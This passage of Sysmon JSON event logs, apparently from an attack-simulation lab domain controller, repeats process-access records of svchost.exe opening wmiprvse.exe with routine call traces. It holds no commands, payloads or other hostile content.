\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:13.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:13.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 